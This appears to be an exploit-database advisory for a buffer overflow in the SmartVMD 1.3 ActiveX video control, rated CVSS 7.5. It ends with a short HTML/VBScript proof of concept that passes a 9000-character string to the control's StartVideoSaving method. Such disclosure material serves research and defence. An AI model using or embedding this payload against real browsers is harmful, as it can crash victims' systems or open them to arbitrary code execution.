SmartVMD ActiveX Control Buffer Overflow Vulnerability

vendor:

SmartVMD

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: SmartVMD

Affected Version From: SmartVMD 1.3

Affected Version To: SmartVMD 1.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SmartVMD ActiveX Control Buffer Overflow Vulnerability

SmartVMD ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

Mitigation:

Input validation should be used to prevent attackers from exploiting this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36217/info

SmartVMD ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

SmartVMD 1.3 is vulnerable; other versions may also be affected.

<object classid='clsid:E3462D53-47A6-11D8-8EF6-DAE89272743C' id='test'></object> <input language=VBScript onclick=aidi() type=button value='test'> <script language='vbscript'> Sub aidi buff = String (9000, "a") test.StartVideoSaving (buff) End Sub </script>